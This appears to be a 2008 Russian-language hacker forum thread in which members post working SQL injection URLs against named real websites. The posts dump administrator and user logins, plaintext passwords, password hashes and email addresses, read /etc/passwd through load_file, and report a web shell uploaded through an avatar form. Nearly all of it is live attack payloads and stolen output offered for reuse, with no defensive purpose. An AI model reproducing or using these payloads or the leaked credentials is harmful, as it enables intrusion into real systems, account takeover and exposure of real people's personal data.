http://www.paradiz.nu/news.php?id=-1+union+select+1,2,concat(login,0x3a,password,0x3a ),4+from+u57027_3.fs_admin+limit+0,10/*
login: admin
pass: maximus
http://www.paradiz.nu/admin
Зы: админка не фурычит - может обманка, или тупо не рабочая.
2la.painkiller
26.07.2008, 11:48
http://www.microhydropower.net/news/viewnews.php?ID=-1+union+select+1,USER(),3,4,5,6,7/*
user: renewabl_webuser
имя БД: renewabl_mhpwebsite
но чтоб узнать пасс, надо знать таблу, для этого либо брутить, либбо информационная схема (не робит, ибо старый мускул), либо вручную угадать простые названия))
kubu:freedom
http://microhydropower.net/user/login_page.php админка
но шел залить ни как не удасцо (
и админка много не даст всё идет через mysql
надеюсь на респект )
http://www.openworld.gov/
PR - 6
http://www.openworld.gov/news/print.php?id=215&lang=2 - Путь к уязвимому скрипту
Первых 5 записей форума
[1]:anonymous:
[2]:bbadmin:93dc6603a409188be197bde54e543056
[3]:A.Natasha:084301fc1b042b1397edb06d1a7c9125
[4]:Âîëêîâ Àëåêñåé:3d863b367aa379f71c7af c0c9cdca41d
[5]:Olga Gornovaya:a122c630d4ac882086a70604dfd43c9e
Первых 5 записей системных юзеров
[1]:vadim:046d0f41a5d82dc559978d127488f339:vadim@proj ectharmony.ru
[2]:olga:df5ee863b0a8ed6114bed2afa3440a9d:olga@projec tharmony.org
[3]:boukel:1fe1985be591afb061dee0857b6a4f47:boukel@pr ojectharmony.ru
[4]:mbuhar:e89c7fb2900fec2c35d3a056160cbe80:mbuhar@pr ojectharmony.ru
[5]:Britta:a15bb2bcc715bbd968f5bae3efae67c4:bbjo@loc. gov
http://www.openworld.gov/
http://www.openworld.gov/phpMyAdmin/
http://www.german-tigers.de/Quiz/phptest-0.6.3/picture.php?image_id=-1+union+select+1,concat_ws(0x3a3a,username,passwor d)+from+users/*
admin::07428b233f457aa2
inurl:"powered by phptest 0.6.3"
http://www.et2d.com/index.php?act=Singer&id=-1%20union%20select%200,concat(password,0x3a,userna me),2,3,4,5+from+users/*
15aa7b432c7f74b11c332b8d60672cc4:Muhammad
inurl:"powered by Live Music Plus"
http://www.justinian.com.ua/album.php?cat=2+union+select+concat_ws(0x3a,ID,Log in,Passw),2,3,4,5,6+from+authUser/*
Админка: www.justinian.com.ua/admin
Login: ups
Password: alladin
помимо скулей и xss,есть баг с zend engine hashes,а так же раскрытие путей,имён таблиц с колонками и т.д. и т.п... Баг на баге).У кого получится залить шелл пишите xDDD.
http://www.soaw.org/pressrelease.php?id=-1+union+select+1,concat_ws(0x3a,user,password),3,4 ,5,6,7,8,9,10,11,12,13+from+phpsp_users--
Таблицы - account, phpsp_users
http://www.kafedra.com.ua/modules/articles/article.php?id=328+union+select+1,2,3,4,concat_ws( 0x3a,version(),user(),database()),6,7,8,9,10,11,12 ,13,14,15,16,17,18,19,20--
http://www.kafedra.com.ua/modules/articles/article.php?id=328+union+select+1,2,3,4,table_name ,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+inf ormation_schema.tables+limit+1,1--
Table: xoops_users
Virgo-vlad:46f227e9cf17e2e1e88b14e679047bd9:252525
andron_AS:123e24289c7434008bec6b61ab8f100a:looper
Barulya:7a4ff1d33e92f1b8e33b8bbb6daf08c6:kos1981
Belle:e76d56e405d994722ac98d9966146010:ghjcnjnfr
Bolt:ba3a02ac8d369c6747c0007368b98500:fkut,hf
chirik:f6c5fe9e207a16fb771e2231a9f30851:231276
crazyman:3e0e92b5dd80c25494d58cac262193fd
Table: user
S Maxim S:4e3acf83f4228b1ca16b7579baa82156
Segoktuhf:0be8ec195a5680fc5fb23848a18e63ba
Pindukled:1a840b31bd4fdf0d7ebfd7188474e997
ruslibrary:e60d4769b08ffc474fa7e53b995b8e4d
Table: ibf_members
automart:0fd4124daf45355c946a2d040ca286e2
password: dallas22
Tolstiy:b3b4d2dbedc99fe843fd3dedb02f086f
password: 1981
chirik:f6c5fe9e207a16fb771e2231a9f30851
password: 231276
sergsava: qwert
Cennarios
27.07.2008, 02:21
http://www.mylover.ru/?mode=rating&rating_id=1&pid=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,concat(l ogin,0x3a,pswd,0x3a,type),14,15,16,17,18,19,20,21, 22,23,24,25,26+from+mylover_data.members+limit+20, 29/*&mark=4
superkrasa::tufundenda
Есть phpmyadmin, но аутентификация не через бд.
бажный скрипт_1: http://webmuseum.mit.edu/detail.php?t=exhibitions&type=exh&f=&s=-1+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15/*
бажный скрипт_2: http://webmuseum.mit.edu/browse.php?id=-1+UNION+SELECT+concat_ws(char(58),USID,EMAIL,SUPER SECRETPASSWORD,ADMIN)+from+Webusers+limit+0,1/*
1:admin@mobius.xg:6416d795663220752ae6f7edc19c87bd :Y
;))
smart.ru
http://www.smart.ru/catalog/goodinfo.asp?pkid=5&catid=187&level=4&barcode=080049101'%20AND%201=@@version--
Microsoft SQL Server 2000 - 8.00.2039 (Intel X86) May 3 2005 23:18:38 Copyright (c) 1988-2003 Microsoft Corporation Developer Edition on Windows NT 5.2 (Build 3790: Service Pack 2)
таблы
http://www.smart.ru/catalog/goodinfo.asp?pkid=5&catid=187&level=4&barcode=080049101'+or(1=(select(max(table_name))fr om[information_schema].tables+WHERE+TABLE_NAME+NOT+IN+('')))--xaction
Дальше http://www.smart.ru/catalog/goodinfo.asp?pkid=5&catid=187&level=4&barcode=080049101'+or(1=(select(max(table_name))fr om[information_schema].tables+WHERE+TABLE_NAME+NOT+IN+('xaction')))--syssegments
Патом
http://www.smart.ru/catalog/goodinfo.asp?pkid=5&catid=187&level=4&barcode=080049101'+or(1=(select(max(table_name))fr om[information_schema].tables+WHERE+TABLE_NAME+NOT+IN+('xaction','sysseg ments')))--sysconstraints
Ну чё я рассказываю, кому надо, поймут :)
Bonnie and Clyde
27.07.2008, 07:21
РусьЕдиная.ру
http://russedina.ru/frontend/heading/economy?id=-999999+union+select+concat(name,0x3a,password),2,3 +from+users/*
uralsJK3:uralsJKL
Bonnie and Clyde
27.07.2008, 20:28
Агенство бизнес новостей // ТИЦ=2600 PR=6
http://www.abnews.ru/index.php?p=sudi_pravo_i_armiya&news=-999999999+union+select+1,2,3,4/*
Queen and Paul Rodgers - Homepage // ТИЦ=30 PR=5
http://www.queenpluspaulrodgers.com/index.php?news_id=-999999999+union+select+1,2,3,4,5,6,7,8/*
Ассоциация Практикующих Ветеринарных Врачей // ТИЦ=40 PR=5
http://www.rsava.org/index.php?cat=54&news_id=-9999999+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13 ,14/*
ОАО «Стеклозавод «НЕМАН» // ТИЦ=110 PR=3
http://www.neman.by/ru/index.php?news_id=-999999999+union+select+1/*
Cennarios
27.07.2008, 21:15
http://www.dunloptyres.ru/tyre.php?id=-1+union+select+1,unhex(hex(concat(login,0x3a,passw ord)))+from+partners+limit+1,1/*,:yes:
Login: DUN-OPT
Pass: 24DUN76df
Открытый пас, бесполезный сайт.
_http://www.hlbs.co.uk/type.php?id=19+union+select+1,2,3,4/*
_http://www.tgfs.com.au/type.php?no=2+union+select+1,2,3,4,5,6,7/*
_http://www.recipe.ru/docs/nd/type.php?id=3+union+select+1,2,3,4,5,6,7,8/*
_http://www.danaeco.ru/addinfo/catalog/type.php?id=-9+union+select+1,2,3,4,5,6,7,8/*
_http://www.burgessbeds.co.uk/product/type.php?id=-7+union+select+1,2,user(),4,5,6,7,8/*
version() - 4.0.30-log
user() - u10042967@lon1-webmysql-2.msh.demon.net
database() - u10042967
_http://alumni.yale.edu/aya/blueprint/type.php?id=-3+union+select+1,2,3,4,5,user()/*
version() - 4.1.20
user() - bp2005@localhost
database() - bpdb2
Cennarios
28.07.2008, 05:23
http://www.sibgastroli.ru/?content=shownews&id=-1+union+select+1,2,3,4,concat(psw,0x3a,user),name, 7,8,9,10,11,12+from+forum_users+limit+0,10/*
login: alone_hunter
password: bear
Выборка по юзерам форума.
Зы: Таких программистов нужно е**ть в сраку =)(Отдавать неграм на растерзание)
Через upload аватара закачивается все что угодно душе =)
Наш выбор madshell.php =)
http://sibgastroli.ru/_images/users/alone_hunter.php
Можно покопаться в корне freebsd'шки агавовского хостинга =)
Cennarios
28.07.2008, 05:25
Забыл: 842637 это пас админа, superadmin! это его же логин.
http://sibgastroli.ru/admin - соответственно админка.
Ассоциация Практикующих Ветеринарных Врачей // ТИЦ=40 PR=5
http://www.rsava.org/index.php?cat=54&news_id=-9999999+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13 ,14/*
Bonnie and Clyde
http://www.rsava.org/index.php?cat=54&news_id=-9999999+union+select+1,2,table_name,4,5,6,7,8,9,10 ,11,12,13,14+from+information_schema.tables/*
TABLES:
article
banner
behaviour
blocks
calculation_articles
config
cost_articles
currensy
data_rassylka
doctors
faq
gallery_image
gallery_moduls
gallery_partition
gallery_people
gradation_execution_order
img_article
language
log
models
moduls
news
partition
rassylka
sale_on_rebate_percent
sclad
sidv_ban
sidv_cenzor
sidv_config
sidv_downloads
sidv_downloads_categoryes
sidv_downloads_comments
sidv_hqfaq
sidv_members
sidv_members_groups
sidv_members_in_groups
sidv_members_users
sidv_memrpass
sidv_modules
sidv_sessions
sidv_smiles
sidv_user
sidv_user_logs
sidv_zones
signs
time_table
user
user_outside
vote
vote_statistic
zakazy
news_file
phpbb_auth_access
phpbb_banlist
phpbb_categories
phpbb_config
phpbb_confirm
phpbb_disallow
phpbb_forum_prune
phpbb_forums
phpbb_groups
phpbb_posts
phpbb_posts_text
phpbb_privmsgs
phpbb_privmsgs_text
phpbb_ranks
phpbb_search_results
phpbb_search_wordlist
phpbb_search_wordmatch
phpbb_sessions
phpbb_sessions_keys
phpbb_smilies
phpbb_themes
phpbb_themes_name
phpbb_topics
phpbb_topics_watch
phpbb_user_group
phpbb_users
phpbb_vote_desc
phpbb_vote_results
phpbb_vote_voters
phpbb_words
aqualung:e05cbba9cd092521901a26346a0e5f3f
то есть можно залить шелл через админку если хэш крякнуть
------
Есть админка:
таблица user:
root:zakryto_cossa
kot:kot
Я как рут увидал сразу понял куда впихать этот пасс
_http://www.rsava.org/admin/
------
Турецкий хекер уже задефейсил(то есть через день,вот падальщики )))
MaSTeR GэN
28.07.2008, 11:54
fat-cat.co.uk
http://fat-cat.co.uk/fatcat/artistInfo.php?id=-52+UNION+SELECT+1,concat_ws(0x1,id,username,passwo rd,email),3,4,5,6,7+FROM+users%20where%20id=2/*
Таблица users:
2�iwantiwantiwant�Seiji25x�dl@tedra.net
3�alex_tea�gundam�alex_tea@r107.co.uk
.................................................. ....................
.................................................. ....................
1442�chuppeth�xq92EAA932�chuppeth@gmail.com
1443�Femyanaehoown�gIPouCm641�lerik66@mymail-in.net
хеш текушева пользователя mysql.user и вывод file_priv
http://fat-cat.co.uk/fatcat/artistInfo.php?id=-52+UNION+SELECT+1,concat_ws(0x1,file_priv,user,pas sword),3,4,5,6,7+from+mysql.user where user=left(user(),locate(0x40,user())-1)/
file_priv нет
N�fatcat�*B4DE6388421C75A631A6BADDCC27DAEE58D0122A
sublackwell.co.uk
http://www.sublackwell.co.uk/gallery.php?id=2+and+substring(version(),1,1)=5--
Mysql 5 версии таблиц интересных не нашел (
http://moldagrotehnica.md
user() = agro@localhost
version() = 4.1.14
database() = moldagrotehnica_md
http://moldagrotehnica.md/votShowRes.php?id_vot=-38/**/union/**/select/**/1,2,3,4/**/from/**/glt_voting_result/**/limit/**/1,1/*
http://moldagrotehnica.md/votShowRes.php?id_vot=-38/**/union/**/select/**/1,2,3,count(*)/**/from/**/glt_users/**/limit/**/0,1/*
count(*) from glt_users = 5
узнал названия и префикс таблиц когда отправил данные в vote.php
Query INSERT INTO `glt_voting_result` failed
админка на первой странице .. но не смог подобрать поля в базе
http://www.pioneerhall.org/ugroups.php?UID=-1+UNION+SELECT+1,concat_ws(0x3a,version(),database (),user()),3,4,5,6,7,8,9,10,11,12,13,14,15--
user - pioneer_mainU@localhost
database - 5.0.51a-
version - pioneer_main
=\
MaSTeR GэN
28.07.2008, 20:00
Prospect-magazine.co.uk
User: prospect@localhost
Version:4.1.20
Database: prospect_master
http://www.prospect-magazine.co.uk/list.php?category=131 UNION SELECT 1,2,3,4,5,6,7,8,9,10,concat_ws(0x1,Id,Email,Passwo rd),12,13 FROM Users where Id=90001/*&allIssues=1
содержание таблицы Users
1�webadmin743@admin.com�T91P73X
***************************
90001�hugh@salinghall.com�boutons
итого логин пасс к админке
user:webadmin743@admin.com�
pass:T91P73X
otmorozok428
28.07.2008, 20:36
http://www.fondsk.ru/article.php?id=-1143+union+select+1,2,3,4,5,concat_ws(0x2f,version (),user(),database()),7,8,9,10,11,12,13,14,15,16,1 7,18,19,20,21,22,23,24,25/*
5.0.45-log/u32888@10.10.223.204/u32888
Все таблицы:
http://www.fondsk.ru/article.php?id=-1143+union+select+1,2,3,4,5,table_name,7,8,9,10,11 ,12,13,14,15,16,17,18,19,20,21,22,23,24,25+from+in formation_schema.tables/*
Все колонки:
http://www.fondsk.ru/article.php?id=-1143+union+select+1,2,3,4,5,column_name,7,8,9,10,1 1,12,13,14,15,16,17,18,19,20,21,22,23,24,25+from+i nformation_schema.columns/*
Внесу некоторые коррективы:
http://www.fondsk.ru/article.php?id=-1143+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14 ,15,16,17,18,19,20,21,22,23,24,25,26--, т.е. столбцов 26, а не 25.
Список таблиц и столбцов получается так:
http://www.fondsk.ru/article.php?id=-1143+union+select+1,2,3,4,5,table_name,7,8,9,10,11 ,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26+from +information_schema.tables+limit+0,1--
http://www.fondsk.ru/article.php?id=-1143+union+select+1,2,3,4,5,column_name,7,8,9,10,1 1,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26+fro m+information_schema.columns+where+table_name+like +char(112,101,114,115,111,110)+limit+0,1--
Так же имеются и другие дырявые скрипты:
http://www.fondsk.ru/article.php?id=1505+union+select+1,2,3,4,5,6,7,8,9 ,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,2 6--
http://www.fondsk.ru/page.php?id=6+union+select+1,2,3,4,5,6,7,8--
http://www.fondsk.ru/articlelist.php?section_id=2+union+select+1--
http://www.fondsk.ru/articlelist.php?§ion_id=14&mode=brief'
http://www.fondsk.ru/author.php?id=160'
http://www.fondsk.ru/articlelist.php?author_id=6'
Список таблиц-столбцов:
**********************
article
----------------------
id
section_id
author1_id
author2_id
author3_id
title
subtitle
keywords
body
flag_hidden
date_publish_ru
date_publish_en
date_create
descript
imgurl
flag_hidden_mui
tik_id
tags
**********************
author
----------------------
id
lastname
firstname
secondname
fio
prefix
suffix
title
bio
**********************
comment
----------------------
id
article_id
comment_id
author
email
subject
body
flag_hidden
flag_approved
date_publish
ip
**********************
content
----------------------
id
title
subtitle
body
createdate
type
parentid
**********************
page
----------------------
id
name
keywords
flag_hidden
body
sequence
url
flag_hidden_mui
**********************
partner
----------------------
id
name
url
flag_hidden
sequence
flag_hidden_mui
bannerurl
**********************
partner_article
----------------------
id
partner_id
title
subtitle
url
flag_hidden
hits
sequence
author
**********************
person
----------------------
id
login
firstname
secondname
lastname
newlastname
birthdate
group_id_before
group_id_after
degree_id
married
sex
jobplace
jobplace_show
industry_id
position
position_show
jobsite
phoned
phoned_show
phoner
phoner_show
phonem
phonem_show
email
email_show
homepage
country_id
city
address
address_show
alive
status
interest_prof
hobby
comment
admin_comment
children
webpage
**********************
section
----------------------
id
name
keywords
sequence
flag_hidden
flag_hidden_mui
type
imgurl
**********************
stat
----------------------
tm
ip
useragent
url
**********************
subscriber
----------------------
id
email
flag_hidden
activationcode
periodicity
flag_hidden_mui
**********************
subscription
----------------------
id
dtstart
dtend
status
dtlaunch
mailsent
flag_hidden_mui
periodicity
**********************
tik
----------------------
id
name
subtitle
url
**********************
охх.. лето лето.. .DE ты? ))
Dfki.de - PR 7
http://www.dfki.de/lt/job_details.php?id=-1+union+select+1,2,3,concat_ws(0x3a,version(),user (),database()),5,6/*
Springer-sbm.de - PR 7
http://www.springer-sbm.de/index.php?id=291+union+select+unhex(hex(version()) )/*
Gfbv.de - PR 6
http://www.gfbv.de/report.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,unhex(hex(version())),18,19,20,21,22,23,24,25, 26,27,28,29,30,31/*
Cennarios
29.07.2008, 13:54
http://www.vashstile.ru/profile.php?id=-1+union+select+1,2,3,4,concat(username,0x3a,passwo rd,0x3a,id),6,7,8,9,10+from+users+limit+63,70/*
Дешевый модератор бесполезного форума
login: Admin
pass: 12345678
Пленный сайт...
http://www.garem.ru/
Сайт проституток и знакомств если правильно понял.
http://www.garem.ru/act.php?id=-13+union+select+1,2,concat(table_name,char(58),col umn_name,char(58),table_schema),4,5,6,7,8,9,10,11, 12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 ,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,4 5,46,47,48,49,50,51,52+from+information_schema.col umns+limit+0,1/*
Сорри времени на разбор небыло да и кому интересно будет там осталось ток таблици узнать.
Behindthename.com - PR 6
http://www.behindthename.com/bb/arcview.php?id=99999999999+union+select+1,2,3,4,5, 6,version(),8,9,10,11,12,13,14,15,16,17,18/*&board=gen
4 ветка..
http://www.behindthename.com/bb/arcview.php?id=99999999999+union+select+1,2,3,4,5, 6,concat_ws(0x3a,user,password),8,9,10,11,12,13,14 ,15,16,17,18+from+mysql.user/*&board=gen
рут..
http://www.behindthename.com/bb/arcview.php?id=99999999999+union+select+1,2,3,4,5, 6,load_file(0x2F6574632F706173737764),8,9,10,11,12 ,13,14,15,16,17,18/*&board=gen
пассы...
пробуйте залить шелл)
Arcoiris.tv - PR 5
http://www.arcoiris.tv/modules.php?id=-9268+union+select+1,2,3,4,5,6,7,8,version(),10,11, 12,13,14,15,16,17/*&name=Unique
http://www.arcoiris.tv/modules.php?id=-9268+union+select+1,2,3,4,5,6,7,8,unhex(hex(concat _ws(0x3a,username,password,0x766974616c))),10,11,1 2,13,14,15,16,17+from+users/*&name=Unique
подобрал таличку.. вывод в сорсе.)
Inst.ru - PR 5
http://www.inst.ru/catalog.php?id=-15+union+select+1,version(),3,4,5,6/*
Freenameastar.com - PR 3
http://www.freenameastar.com/viewstar.php?id=-231237+union+select+1,2,3,4,5,6,7,version(),9,10,1 1,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26/*
Jets.gaiva.ru
http://jets.gaiva.ru/index.php?id=read&name=effective&alt=3&E_ID=999999+union+select+version()/*
Calcutta
29.07.2008, 19:31
http://www.nord-east.ru/index.php?id=7+union+select+1,concat_ws(0x3a,table _name),3,4+from+information_schema.tables+limit+0, 1--
интересных таблиц не нашел -(
otmorozok428
29.07.2008, 19:52
ToneZ.NET.RU - Мелодии для мобильных телефонов
http://tonez.net.ru/show.php?model=4+union+select+1,2,3,4,5/*
http://tonez.net.ru/show.php?model=4+union+select+1,2,3,concat_ws(char (58,58),version(),user(),database()),5/*
version(): 5.0.45-log
user(): u14145@10.10.10.222
database(): u14145
Список таблиц-столбцов получаем так:
http://tonez.net.ru/show.php?model=4+union+select+1,2,3,table_name,5+f rom+information_schema.tables/*
http://tonez.net.ru/show.php?model=4+union+select+1,2,3,column_name,5+ from+information_schema.columns+where+table_name+l ike+char(117,115,101,114,115)/*
Таблицы в базе:
_pictures
authors
baners
bannertext
catalog
content_sup
melodies
mnews
models
mp3
mp3_pictures
mp3_trash
p_authors
p_authors_copy
p_authors_trash
p_melodies
p_melodies_copy
p_melodies_replace
p_melodies_trash
p_pictures
p_popsearch
pictures
popsearch
voice
voice_trash
accgames
brends
car_fmk
car_img
car_info
codes
countries
firmbrends
firmparts
firms
games
genres
kpk
operators
patches
ph_game_images
ph_game_phones
ph_games
ph_genre
ph_phones
ph_top_games
ph_update
phones
q1
sites
subscribe
subscribe_themes
subscribe_users
targeting
towns
users
works
К сожалению, для доступа к самым интересным таблицам (типа users) не хватает прав. Жаль, ведь счастье было так близко... Может быть, здесь:
http://tonez.net.ru/admin
Miraclemileshopslv.com - PR 4
http://www.miraclemileshopslv.com/entertainment.php?id=-1+union+select+1,unhex(hex(version())),3,4,5,6,7,8 ,9/*&name=FAB+FOUR
Datahop.net - PR 4
http://www.datahop.net/item_datacentres.php?id=-1+union+select+1,2,3,4,5,6,7,8,version(),10/*
Recko.name - PR 4
http://www.recko.name/index.php?id=-1'+union+select+version()/*&view=articl
Mobilegamefaqs.com - PR 4
http://www.mobilegamefaqs.com/gameinfo.php?id=99999)+union+select+version()/*
Nemovitosti.cz - PR 5
http://www.nemovitosti.cz/pravoclanek.php?id=-100007+union+select+1,concat_ws(0x3a,table_name),v ersion(),4,5,6,7+from+information_schema.tables+li mit+17,1/*
5 версия..
http://www.nemovitosti.cz/pravoclanek.php?id=-100007+union+select+1,concat_ws(0x3a,login,passwor d),3,4,5,6,7+from+hartlhaus.webman_user/*
1 таблица с паролями..
http://www.nemovitosti.cz/pravoclanek.php?id=-100007+union+select+1,concat_ws(0x3a,login_name,en coded_password),3,4,5,6,7+from++lojza_sk.user+limi t+2,1/*
2 таблица с паролями..
http://www.nemovitosti.cz/pravoclanek.php?id=-100007+union+select+1,concat_ws(0x3a,login_name,en coded_password),3,4,5,6,7+from++lojza_demo.user+li mit+2,1/*
3 таблица с паролями..
http://www.nemovitosti.cz/pravoclanek.php?id=-100007+union+select+1,concat_ws(0x3a,user,password ),3,4,5,6,7+from+mysql.user/*
рут..
http://www.nemovitosti.cz/pravoclanek.php?id=-100007+union+select+1,load_file(0x2F6574632F706173 737764),3,4,5,6,7/*
file_priv y
Ewrc.cz - PR 4
http://www.ewrc.cz/ewrc/show.php?id=-7811+union+select+1,2,concat_ws(0x3a,table_name),4 ,version(),6,7,8,9,10,11,12,13,14,15,16,17,18,19,2 0,21,22,23,24+from+information_schema.tables+limit +16,1/*
5 версия..
http://www.ewrc.cz/ewrc/show.php?id=-7811+union+select+1,2,concat_ws(0x3a,M_NAME,M_PASS WORD),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 ,21,22,23,24+from+ewrc_cz.user_export/*
юзерпассы )
Vzlu.cz - PR 5
http://www.vzlu.cz/services.php?id=9999999+union+select+concat_ws(0x3 a,database(),user(),version())/*
4 ветка..
http://www.vzlu.cz/services.php?id=9999999+union+select+unhex(hex(con cat_ws(0x3a,version(),user,pass)))+from+users/*
админка (http://forum.antichat.ru/showpost.php?p=793941&postcount=539)
Pragoimex.cz - PR 4
http://www.pragoimex.cz/ru/l.php?id=-40%27+union+select+version()/*
Tvm-valmez.cz - PR 4
http://www.tvm-valmez.cz/index.php?id=109&catit=-104+union+select+version(),2,3,4,5,6,7,8,9,10,11,1 2,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28, 29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45 ,46/*
Magick.cz - PR 3
http://things.magick.cz/magick/index.php?id=-1+union+select+1,2,3,4,5,6,version(),8,9,10,11,12, 13,14,15/*&co=celej
4 ветка..
http://things.magick.cz/magick/index.php?id=-1+union+select+1,2,3,4,5,6,concat_ws(0x3a,user,pas sword),8,9,10,11,12,13,14,15+from+mysql.user/*&co=celej
рут..
http://things.magick.cz/magick/index.php?id=-1+union+select+1,2,3,4,5,6,load_file(0x2F6574632F7 06173737764),8,9,10,11,12,13,14,15/*&co=celej
file_priv y
http://www.myspacegamesandvideos.com/ajax.php?rs=__exp__getFeedContent&rsargs[]=-99%20UNION%20SELECT%20concat(char(58),uname,char(5 8),password),2,3,4,5,6,7,8,9,0,1,2,3%20FROM%20user s--
root:7c49f9a7e14cb74eefa0e34f7fd09eb4
http://www.cstore.ru/
http://www.cstore.ru/download.php?id=9999+union+select+1,2,3,4,5,concat _ws(char(32,58,32),user(),database(),version()),7, 8,9,10/*&%20SessionID=89a2d2a4880545b115cc
version = 4.0.27-log
user = qwe1rty@pm9.zenon.net
database = qwe1rty
Не смог подобрать таблички,кто сделает это, буду очень благодарен,если сообщит об этом =)
http://www.cult.bg/ind_dotCult_full.php?id=-81+union+select+1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7, 8,9,0,1,2,3
User:Root@localhost
Version:5
Только чето сайт какой-то у меня медленный,замучался крутить,так и не докрутил
таблиц со словом forum около 5-8
----
Ресурс очень большой,кажись по кулютуре Болгарии,я бы с радостью раскрутил НО...
Rave.cz - PR 5
http://www.rave.cz/clanek.php?id=-11444+union+select+1,2,3,4,5,6,7,version(),9,10,11 ,12,13,14,15,16,17,18,19,unhex(hex(table_name)),21 ,22,23,24,25,26+from+information_schema.tables--
5 ветка.. вот и таблы..
http://www.rave.cz/clanek.php?id=-11444+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,1 4,15,16,17,18,19,unhex(hex(concat_ws(0x3a,nick,hes lo))),21,22,23,24,25,26+from+auth_admin--
это хеши админов..
http://www.rave.cz/clanek.php?id=-11444+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,1 4,15,16,17,18,19,unhex(hex(concat_ws(0x3a,nick,hes lo))),21,22,23,24,25,26+from+rave_admin_auth+limit +2,1--
что это за хеш? тоже админов..
http://www.rave.cz/clanek.php?id=-11444+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,1 4,15,16,17,18,19,unhex(hex(concat_ws(0x3a,nick,pas sword))),21,22,23,24,25,26+from+users--
вот это уже юзеры..
http://www.rave.cz/clanek.php?id=-11444+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,1 4,15,16,17,18,19,unhex(hex(concat_ws(0x3a,nick,pas sword))),21,22,23,24,25,26+from+users_zaloha--
и еще юзеры..)
Clovekvtisni.cz - PR 5
http://clovekvtisni.cz/index2en.php?id=511+union+select+1,concat_ws(0x3a, table_name,table_schema),3+from+information_schema .tables/*
5 версия и таблы..
http://clovekvtisni.cz/index2en.php?id=511+union+select+1,concat_ws(0x3a, mail,psswd),3+from+apl/*
апликанты))
http://clovekvtisni.cz/index2en.php?id=511+union+select+1,concat_ws(0x3a, email,password),3+from+pinf.users/*
каких то 3 несчастных юзера..
Cagi.cz - PR 5
http://www.cagi.cz/novinka.php?id=-171%27+union+select+1,2,3,version(),5,6/*
тИЦ: 150
http://www.componentace.com/order/?id=-4+union+select+1,2,version(),4,5,6
version() - 5.0.51-log
user() - componentace_c_5@209.61.200.8
database() - componentace_com_5
CHARACTER_SETS
COLLATIONS
COLLATION_CHARACTER_SET_APPLICABILITY
COLUMNS
COLUMN_PRIVILEGES
KEY_COLUMN_USAGE
PROFILING
ROUTINES
SCHEMATA
SCHEMA_PRIVILEGES
STATISTICS
TABLES
TABLE_CONSTRAINTS
TABLE_PRIVILEGES
TRIGGERS
USER_PRIVILEGES
VIEWS
articles
categories
downloads
editions
files
licenses
links
news
options
pages
price
productarticles
products
producttestimonials
testimonials
txtbanners
тИЦ: 150
http://www.taksa-shop.ru/index.php?id=9999999999999+union+select+1,version( )/*
version() - 5.0.32-Debian_7etch5-log
user() - taksa@web.holtglobal.com
database() - taksa_shop_ru
CHARACTER_SETS
COLLATION_CHARACTER_SET_APPLICABILITY
COLUMNS
COLUMN_PRIVILEGES
KEY_COLUMN_USAGE
ROUTINES
SCHEMATA
SCHEMA_PRIVILEGES
STATISTICS
TABLES
TABLE_CONSTRAINTS
TABLE_PRIVILEGES
TRIGGERS
USER_PRIVILEGES
VIEWS
SCM4_BABY
SCM4_BBS_IMAGES
SCM4_BBS_INFO
SCM4_BBS_TABLE
SCM4_SHOP
SCM4_SHOP_HISTORY
SCM4_TAKSABASE
SCM4_USERS
applet
billboard
frame
frtext
html
library
links
news
photo
photolink
pitomnic
query
rigging
search
show_detals
show_info
template
text
tree
users
kremator
30.07.2008, 09:11
http://www.goto.kz/content.php?id=1'
http://www.yuretz.ru/prikol.php?id=471'
http://www.fasie.ru/index.php?rid=1'
http://ocenshik.mostpp.ru/anons.php?id=1'
http://www.milim.com/news.php?id=-1+union+select+1,2,3,4,5,6,7,8/*
Expats.cz - PR 6
http://www.expats.cz/prague/event.php?id=-8544+union+select+1,2,3,4,version(),6,7,8,9,10,11, 12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 ,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43/*
Cz-usa.com - PR 4
http://www.cz-usa.com/product_detail.php?id=-28+union+select-1,2,version(),4,5,6/*
Revnice.cz - PR 3
http://www.revnice.cz/stranka.php?id=-95+union+select+1,2,3,4,table_name,6+from+informat ion_schema.tables+limit+42,1/*
админка (http://forum.antichat.ru/showpost.php?p=793941&postcount=539)
otmorozok428
30.07.2008, 11:23
PareO Шоп
http://www.pareo.ru/info.php?t1=38&t=4'+union+select+1,2,version(),4--'
http://www.pareo.ru/katalog.php?t=1&t1=1&br=31'+union+select+1,version(),3,4,5--'
http://www.pareo.ru/photo.php?f=2834'+union+select+1,2,3,4,5--'
version(): 4.1.22
user(): alex-sport_pareo@localhost
database(): alex-sport_pareo
geezer.code
30.07.2008, 12:46
oculus.ru
PR - 5
_ttp://oculus.ru/stat.php?tom=-1+union+select+1,unhex(hex(concat_ws(version(),use r(),database()))),3,4,5/*
oculus@localhost
4.1.14-log
oculus
sweb - поэтому инъекцию крутить дальше надо через POST
elportal.ru
PR - 3
http://www.elportal.ru/stat.php?id=-34+union+select+concat_ws(0x3a,version(),user(),da tabase())/*
4.1.22:irweb@localhost:wwwirwebru
и на последок поклонникам DOOM3
pr - 3
http://www.doom3.ru/stat.php?id_rubr=1+and+substring(version(),1,1)=4/*
вывода нет. версия мускула - 4.0.*
prescott
30.07.2008, 14:20
К сожалению, для доступа к самым интересным таблицам (типа users) не хватает прав. Жаль, ведь счастье было так близко... Может быть, здесь:
